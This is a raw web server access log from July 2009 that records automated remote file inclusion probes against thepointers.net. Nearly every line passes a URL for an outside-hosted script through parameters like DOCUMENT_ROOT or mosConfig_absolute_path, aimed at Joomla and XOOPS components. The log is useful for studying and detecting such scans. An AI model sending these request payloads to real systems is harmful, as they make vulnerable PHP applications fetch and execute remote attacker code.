66.11.230.36 - - [05/Jul/2009:07:35:21 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
82.194.87.219 - - [05/Jul/2009:07:40:42 -0700] "GET /logs//main.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
84.38.65.112 - - [05/Jul/2009:07:42:33 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
84.38.65.112 - - [05/Jul/2009:07:42:33 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.thepointers.net"
84.38.65.112 - - [05/Jul/2009:07:42:33 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:42:44 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:42:44 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:42:44 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.thepointers.net"
74.223.143.131 - - [05/Jul/2009:07:43:04 -0700] "GET /logs/access_080925.log%20%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
74.223.143.131 - - [05/Jul/2009:07:43:04 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.thepointers.net"
211.242.110.197 - - [05/Jul/2009:07:43:04 -0700] "GET /logs/access.log/main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
74.223.143.131 - - [05/Jul/2009:07:43:04 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.thepointers.net"
211.242.110.197 - - [05/Jul/2009:07:43:05 -0700] "GET /logs/main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.242.110.197 - - [05/Jul/2009:07:43:05 -0700] "GET /main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.242.110.197 - - [05/Jul/2009:07:43:18 -0700] "GET /main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.242.110.197 - - [05/Jul/2009:07:43:18 -0700] "GET /logs/main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.242.110.197 - - [05/Jul/2009:07:43:19 -0700] "GET /logs/access.log/main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
74.223.143.131 - - [05/Jul/2009:07:43:40 -0700] "GET /logs/access.log%20%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
84.38.65.112 - - [05/Jul/2009:07:43:57 -0700] "GET /logs/access_080925.log%20%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
84.38.65.112 - - [05/Jul/2009:07:43:57 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.thepointers.net"
84.38.65.112 - - [05/Jul/2009:07:43:57 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.thepointers.net"
84.38.65.112 - - [05/Jul/2009:07:44:38 -0700] "GET /logs/access.log%20%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:44:46 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:44:46 -0700] "GET /logs/access_080925.log%20%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:44:47 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.thepointers.net"
211.242.110.197 - - [05/Jul/2009:07:44:59 -0700] "GET /logs/access.log%20%20/main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
119.245.138.143 - - [05/Jul/2009:07:44:59 -0700] "GET /logs/access.log/index.php?openfile=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
119.245.138.143 - - [05/Jul/2009:07:44:59 -0700] "GET /index.php?openfile=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
119.245.138.143 - - [05/Jul/2009:07:44:59 -0700] "GET /logs/index.php?openfile=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
211.242.110.197 - - [05/Jul/2009:07:45:08 -0700] "GET /logs/access.log%20%20/main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
84.38.65.112 - - [05/Jul/2009:07:45:10 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
84.38.65.112 - - [05/Jul/2009:07:45:10 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.thepointers.net"
84.38.65.112 - - [05/Jul/2009:07:45:10 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.thepointers.net"
74.223.143.131 - - [05/Jul/2009:07:45:21 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.thepointers.net"
74.223.143.131 - - [05/Jul/2009:07:45:21 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.thepointers.net"
74.223.143.131 - - [05/Jul/2009:07:45:21 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.242.110.197 - - [05/Jul/2009:07:45:31 -0700] "GET /logs/access_080925.log%20%20/main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:45:44 -0700] "GET /logs/access.log%20%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:45:55 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:45:55 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:45:56 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.242.110.197 - - [05/Jul/2009:07:45:59 -0700] "GET /logs/access_080925.log%20%20/main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:48:37 -0700] "GET /logs/access_080925.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:48:37 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.79" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:48:38 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:48:53 -0700] "GET /logs/access_080925.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:48:54 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:48:54 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.79" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:49:31 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:49:37 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
88.191.37.60 - - [05/Jul/2009:07:50:35 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
88.191.37.60 - - [05/Jul/2009:07:50:36 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "www.thepointers.net"
88.191.37.60 - - [05/Jul/2009:07:50:36 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "www.thepointers.net"
222.231.1.215 - - [05/Jul/2009:07:50:42 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
222.231.1.215 - - [05/Jul/2009:07:50:42 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.thepointers.net"
222.231.1.215 - - [05/Jul/2009:07:50:42 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "www.thepointers.net"
88.191.37.60 - - [05/Jul/2009:07:50:51 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
88.191.37.60 - - [05/Jul/2009:07:50:51 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "www.thepointers.net"
88.191.37.60 - - [05/Jul/2009:07:50:51 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "www.thepointers.net"
82.194.87.219 - - [05/Jul/2009:07:51:10 -0700] "GET /logs//main.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
88.191.37.60 - - [05/Jul/2009:07:51:19 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "www.thepointers.net"
88.191.37.60 - - [05/Jul/2009:07:51:19 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "www.thepointers.net"
88.191.37.60 - - [05/Jul/2009:07:51:19 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
89.171.190.110 - - [05/Jul/2009:07:51:29 -0700] "GET /logs/access_080925.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
89.171.190.110 - - [05/Jul/2009:07:51:32 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.thepointers.net"
89.171.190.110 - - [05/Jul/2009:07:51:32 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.79" "www.thepointers.net"
82.194.87.219 - - [05/Jul/2009:07:51:37 -0700] "GET /logs///common/db.php?commonpath=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
82.194.87.219 - - [05/Jul/2009:07:52:15 -0700] "GET /logs//main.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:07:52:18 -0700] "GET /logs/access.log%20%20//oneadmin/photogallery/include.php?path[docroot]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:07:52:18 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:07:52:18 -0700] "GET /oneadmin/photogallery/include.php?path[docroot]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:07:53:47 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:07:53:47 -0700] "GET /logs/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:07:53:47 -0700] "GET /logs/access_090510.log/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:07:53:51 -0700] "GET /logs/access_090128.log/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
80.248.208.177 - - [05/Jul/2009:07:53:59 -0700] "GET /logs/access.log/?sourcedir=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
80.248.208.177 - - [05/Jul/2009:07:53:59 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.thepointers.net"
80.248.208.177 - - [05/Jul/2009:07:53:59 -0700] "GET /logs/?sourcedir=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 200 2368 "-" "libwww-perl/5.805" "www.thepointers.net"
84.17.129.100 - - [05/Jul/2009:07:54:13 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
84.17.129.100 - - [05/Jul/2009:07:54:13 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
84.17.129.100 - - [05/Jul/2009:07:54:14 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
89.171.190.110 - - [05/Jul/2009:07:54:16 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:55:20 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:55:20 -0700] "GET /logs/access.log%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:55:20 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.79" "thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:55:20 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.79" "thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:55:20 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "thepointers.net"
84.51.241.6 - - [05/Jul/2009:07:55:20 -0700] "GET /logs/access.log%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
61.78.62.84 - - [05/Jul/2009:07:57:34 -0700] "GET /logs/access.log//oneadmin/photogallery/include.php?path[docroot]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:07:57:35 -0700] "GET /oneadmin/photogallery/include.php?path[docroot]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.78.62.84 - - [05/Jul/2009:07:57:35 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
222.231.1.215 - - [05/Jul/2009:07:58:49 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
222.231.1.215 - - [05/Jul/2009:07:58:49 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "thepointers.net"
222.231.1.215 - - [05/Jul/2009:07:58:49 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "thepointers.net"
61.109.250.63 - - [05/Jul/2009:07:59:23 -0700] "GET /logs/access_090408.log%20%20/port.php?content=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.109.250.63 - - [05/Jul/2009:07:59:23 -0700] "GET /logs/access_090413.log%20%20/port.php?content=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.109.250.63 - - [05/Jul/2009:07:59:23 -0700] "GET /port.php?content=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.109.250.63 - - [05/Jul/2009:07:59:23 -0700] "GET /logs/port.php?content=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
88.191.37.60 - - [05/Jul/2009:08:00:28 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "www.thepointers.net"
88.191.37.60 - - [05/Jul/2009:08:00:28 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "www.thepointers.net"
88.191.37.60 - - [05/Jul/2009:08:00:41 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
80.248.208.177 - - [05/Jul/2009:08:02:16 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.thepointers.net"
80.248.208.177 - - [05/Jul/2009:08:02:16 -0700] "GET /logs/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.thepointers.net"
80.248.208.177 - - [05/Jul/2009:08:02:20 -0700] "GET /logs/access.log%20%20/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
82.194.87.219 - - [05/Jul/2009:08:02:27 -0700] "GET /logs//main.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
66.11.230.36 - - [05/Jul/2009:08:02:30 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
66.11.230.36 - - [05/Jul/2009:08:02:31 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
66.11.230.36 - - [05/Jul/2009:08:02:31 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
82.194.87.219 - - [05/Jul/2009:08:04:01 -0700] "GET /logs//index.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
82.194.87.219 - - [05/Jul/2009:08:04:42 -0700] "GET /logs//index.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
82.194.87.219 - - [05/Jul/2009:08:07:01 -0700] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
88.191.37.60 - - [05/Jul/2009:08:08:09 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
88.191.37.60 - - [05/Jul/2009:08:08:22 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
88.191.37.60 - - [05/Jul/2009:08:08:35 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
88.191.37.60 - - [05/Jul/2009:08:08:47 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
66.11.230.36 - - [05/Jul/2009:08:10:42 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
66.11.230.36 - - [05/Jul/2009:08:10:43 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
66.11.230.36 - - [05/Jul/2009:08:10:43 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
89.171.190.110 - - [05/Jul/2009:08:11:56 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "thepointers.net"
89.171.190.110 - - [05/Jul/2009:08:11:56 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.79" "thepointers.net"
89.171.190.110 - - [05/Jul/2009:08:11:56 -0700] "GET /logs/access.log%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
82.194.87.219 - - [05/Jul/2009:08:12:30 -0700] "GET /logs//main.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
89.223.3.98 - - [05/Jul/2009:08:12:34 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
